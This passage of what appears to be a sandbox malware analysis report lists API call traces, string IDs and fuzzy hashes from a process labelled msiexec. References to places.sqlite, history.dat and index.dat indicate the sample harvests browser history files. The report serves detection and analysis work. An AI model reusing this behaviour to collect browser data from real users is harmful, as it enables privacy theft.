                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1979745280-0
                                                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                    • API String ID: 2641622041-467022611
                                                                                                    • Opcode ID: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                    • Opcode Fuzzy Hash: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 839530781-0
                                                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID: *.*$index.dat
                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
APIs
• Sleep.KERNEL32(00000064), ref: 004175D0
• CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp
• String ID: .#v
• API String ID: 2081463915-507759092
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
• CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
APIs
  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
Similarity
• API ID: File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 2154303073-0
APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
APIs
• FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• API String ID: 3859505661-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
APIs
• FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
APIs
• CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
APIs
• EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
APIs
• FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
APIs
• GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1828521557-0
                                                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
